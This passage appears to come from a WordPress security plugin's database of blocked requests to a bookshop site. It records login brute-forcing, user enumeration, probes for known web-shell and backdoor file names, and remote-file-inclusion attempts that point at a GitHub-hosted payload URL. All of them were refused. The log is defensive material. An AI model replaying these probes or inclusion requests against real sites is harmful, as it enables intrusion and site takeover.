Safari\\/537.77.4\"}','gChM8KsYW9poZR0x41BrVGcD',0,1637711027.8969,162,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','gP7QnsvZYhjb4RmJ6uEWyLFc',0,1637714816.8548,188,'','POST',403,0,600,0,1,'',0),('147.182.140.149',2478214293,'','https://ashbooks.co.uk/phpinfo.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','S4pZruBzKRtClmbO7v1JgjWG',0,1637714879.9308,181,'','GET',403,0,700,0,1,'',0),('147.182.140.149',2478214293,'','https://ashbooks.co.uk/info.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','sDgFqZiuvR8hLQASyKGbpYXx',0,1637714884.4146,546,'','GET',403,0,700,0,1,'',0),('69.30.240.26',1159655450,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','eKMzjiA8HvrU4wXhTJ53n2uB',0,1637720661.8844,14341,'','POST',403,0,600,0,1,'',0),('69.30.225.182',1159651766,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','EifclvhLdbRTQ1qO8eHmD40k',0,1637721675.8345,427,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5RViPL7jAHcIsOYNuMvGmhxw',0,1637721989.8616,622,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vP3AHyTsRZ9nIL6FXfjB0Vre',0,1637721991.9245,404,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lfaZQgjOmHLXR30t8ibFqYsw',0,1637721994.1899,401,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hiDMwqGRsQd0BoYTEWKNVfkU',0,1637721996.1384,638,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hwXe4p5Mvx0H7Ffbs8TEqYAB',0,1637722003.8815,453,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Puzw2Q4ph56Yrf09em1y8kMv',0,1637722005.9403,368,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','21LTMcgV3ZYeRSldPsHvywGB',0,1637722007.8394,384,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jHneIzEcVMxuwA0ySC4WNDvB',0,1637722009.8469,414,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8hm5BYZnbaocqexQ2L1437DV',0,1637722013.8629,653,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rJy0pmzqIcYKQ1Z2MUAgTB9l',0,1637722015.9836,630,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Zj1Qt5ofK2uJNDyUATczWHpg',0,1637722018.5901,419,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9J6PqNerR2v1CZDQ3XKFu5Go',0,1637722031.4478,454,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XfTFY7mjSQiI9OyJ1lB2EKds',0,1637722037.1318,392,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JdRh2l5UgOXAKNsbItTWwjYH',0,1637722039.2766,400,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OmPkEiUZ7aBAqoFvdQ2360x8',0,1637722043.7724,424,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BGhvP96oir40VzdU8OEXFgHZ',0,1637722045.6954,436,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YD7qPbWpg3eRwoUOcyKTsnJ8',0,1637722048.2939,604,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KVbdXZyWj628keQ4UY7sBCnh',0,1637722050.7288,433,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kAVx8bRv9cyJUYhDTfrWo1qB',0,1637722052.9641,407,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Dxuc3ZEpe7FhTIbjHVSf2WvO',0,1637722055.1397,481,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','G2CjXf0UOeWLHru6ya7wmh5d',0,1637722057.2869,417,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rdLgZKfampDOteX3NkWl9M1T',0,1637722059.2420,480,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4m2JaiKo1k3XhCY7SxpeQEGr',0,1637722061.2287,385,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uYoTcqj18QLJ0ZE5whHnaNdR',0,1637722062.9322,378,'','GET',403,0,700,0,1,'',0),('69.30.225.182',1159651766,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','0vjNCK5rzWXDRsZY3iL8BAHT',0,1637722063.1797,174,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','18hlRpOXNdtIa492K6ZzEvBV',0,1637722064.9871,424,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vBMaP3dlWfu8Tr9XY2K174OR',0,1637722066.8894,424,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wOeSykjlfstLzI861HRDd7Xh',0,1637722068.8711,436,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YeFaQHus8ijdBzpy7Cl4A92t',0,1637722071.1266,416,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','y8giZF3emdr0VTC6U2I9cESo',0,1637722073.3273,408,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MPg9XBo5nNkYaDqVUF0ShudL',0,1637722076.7224,454,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dDbKmxG9HJIT62lFz18Bw3tf',0,1637722078.8485,391,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0iFSaVhsynglXfHZMAQ78vGY',0,1637722080.7005,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FVM7vqunlhopy5gSRCkwLmNO',0,1637722082.9324,401,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RLvyzefrlBZciTDHom5jJ4bq',0,1637722084.9441,421,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fdiqpsPVU7F6SbBoce938vwR',0,1637722087.0538,487,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1quVlx2Em8XJNTdfyICOzvpt',0,1637722088.9296,406,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aqoeHJmn9S2OMIsR0c6Uybki',0,1637722090.7148,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DEWAbnigRdr6TUwpGNBmFOqx',0,1637722092.9073,416,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MUzvqGX1oaePjAighpr45Q2J',0,1637722098.1757,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1XwQMeByEHvPlWiru0jfmTYC',0,1637722099.8382,400,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','r4UdOSDIL0MW3AJYZG5VpBcX',0,1637722101.7301,431,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','w9lAk8MZT71xDeH5p3SbnKU0',0,1637722103.8707,426,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dgmM3ByQ09lLHo1epEOfUvxw',0,1637722105.8084,410,'','GET',403,0,700,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/accesson.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','kzmDCuYKGtZrqswBIEgQOH0N',0,1637729621.0106,471,'','GET',403,0,700,0,1,'',0),('20.122.7.68',343541572,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','gbyNXSzi9cMGQuEOfwdZ0vBD',0,1637731215.9342,152,'','GET',403,0,520,0,1,'',0),('107.150.57.35',1805007139,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','TJEWyczB8Mf3HGOUAD0b4dCu',0,1637731432.5687,173,'','POST',403,0,600,0,1,'',0),('69.30.231.155',1159653275,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','hsVdoaH4IkiY7v2DuxnqZpeL',0,1637735002.5978,500,'','POST',403,0,600,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','up3amT4vDlA87GLcYHgyWEV9',0,1637740994.9827,188,'','GET',403,0,520,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','D5pibcBWSfehgwtmGqJYHKnE',0,1637742219.5209,595,'','GET',403,0,520,0,1,'',0),('69.64.48.135',1161834631,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','MyDQNdn9btGRcx4g3h2SuOiC',0,1637742326.5057,442,'','GET',403,0,520,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','zKpFfPSxALX4dZBtIu968qTb',0,1637750174.3733,435,'','GET',403,0,520,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-json/wp/v2/users/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','5mnHja2bCYO9ZtNzQ7LIpf18',0,1637753447.5464,148,'','GET',403,0,520,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-json/wp/v2/users/2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','naC2Desz0ktxIFoJcbAVW1E7',0,1637753447.7842,150,'','GET',403,0,520,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-json/wp/v2/users/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','DV6JMoBNy0KWPO7wXsY4rC8m',0,1637753448.0190,427,'','GET',403,0,520,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','vKORzqQjLEcXg8wprtbfmCH7',0,1637753448.7138,196,'','POST',403,0,600,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','2Aybt9o5H84vZhPq6GdBRNFS',0,1637753449.1738,421,'','POST',403,0,600,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','IXiQG3bKVedBJvx6wP8nSTpH',0,1637753450.0076,675,'','POST',403,0,600,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','m2ksL40jKEhZ6d93zB1RCDIQ',0,1637753452.0575,419,'','POST',403,0,600,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','Q2aWRbe9DjtgGNJoh4wzfP7k',0,1637753452.9573,213,'','POST',403,0,600,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','9NKEap5VzegoflwxRdXIjcmY',0,1637753455.0914,386,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','53fXWrQnzLvUAduOENtZDi1Y',0,1637753455.7950,488,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','80H2gzlXRSMxQ6eqOKUAyDnG',0,1637753456.7355,150,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','eoIBx7KThwqd9RsO4p3zPaQD',0,1637753457.1369,384,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','aJ14wDfos2K6C8HOIRTtnWPd',0,1637753457.7992,130,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','YgmROMNZFvV9Lzypos4Gr3ec',0,1637753458.1846,380,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','cr8fzFvehw0974UudLMDYAaQ',0,1637753458.8511,146,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 